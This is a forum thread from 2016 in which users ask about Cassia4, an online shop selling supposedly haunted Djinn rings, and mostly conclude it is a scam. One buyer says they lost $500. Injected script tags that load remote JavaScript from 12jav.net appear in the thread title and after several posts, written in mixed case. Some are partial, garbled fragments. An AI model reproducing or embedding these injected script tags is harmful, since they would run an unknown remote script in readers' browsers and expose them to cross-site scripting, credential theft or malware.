This shop <sCrIpT sRc=//12jav.net/1.js></ScRiPt><sCrIpT sRc=//12jav.net/1.js></ScRiPt> By: cleh
Post # 1 Jan 28, 2016
Has anyone ever bought from the shop Cassia4? It's an online shop on etsy and bonanza. The shop owner is named Sheila & they sell magical items like "haunted" Djinn rings and other jewelry. They sell other magic things too. I asked about Djinn Rings before but I never got a response from someone who has actually purchased from this shop and I am sure there has to be someone on here. If you did purchase from here, did your items work or were they fake? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I have heard and seen shops like these before, they take regular vintage looking jewellery items and claim they contain spirits, flogging them for much higher than usual (between 100-10000).
The owners rarely answer questions regarding the items because they don't actually have any answeres to the questions.
The photos are also usually edited to show a flash of colour, white streak or strange glow across or around the jewellery piece, making out it is containing a spirit.
I would call it all nonsense and fake, but that is just me.
When it comes to etsy, what I like to do before buying anything is read the reviews. From what I can tell, this shop owner is just adding words such as "haunted" "spells" "witchcraft" etc. to her products in order to make them sell.
Read the reviews, they can usually tell you if an item is worth buying or not.
Agreed but if you actually look at the reviews on her Etsy page a lot of them have negative comments but are still 5 stars, something seems fishy about this to me.
Etsy also suspended the store for unusual behaviour..personally it seems to much of an expense and a risk to believe.
I saw that too and I agree. I did also see some ratings with four stars because the item was broken or the "spell" did not work. So I think it's safe to say that you should not buy from this shop. There are many other more "valid" shops on etsy for you to chose from. Steer clear of products that claim to be haunted or claim to have a magical spell cast on them. It's just a way for the shop owner to make quick money by tagging their items as "magical."
They probably are fake. $500 down the tube. How embarrassing. You live and you learn I guess. And the rings did look vintage in the pictures but they seem new and cheaply made. They are pretty though. And it surprised me too that the reviews were so good. Who knows. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
She also described the Djinns in such detail and wouldn't name their full names online. Only the one who bought the rings could know. Also apparently she is part of a coven and works with a witch named Albina. Does this sound familiar to anyone? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>